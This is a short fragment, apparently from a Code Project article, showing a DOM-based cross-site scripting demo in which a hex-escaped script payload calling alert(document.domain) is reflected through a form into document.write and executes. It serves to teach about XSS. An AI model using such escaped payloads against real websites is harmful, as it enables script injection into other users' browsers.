document.write: <input type="text" name="p1" size="60" value="hogehoge"> <input type="submit" value="reflect"> <pre><script>document.write("hogehoge");</script>
\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
<pre>document.write: <input type="text" name="p1" size="60" value="\x3cscript\x3ealert(document.domain);\x3c/script\x3e"> <input type="submit" value="reflect"> <hr class=red> <pre><script>document.write("\x3cscript\x3ealert(document.domain);\x3c/script\x3e");</script>
var
This content, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)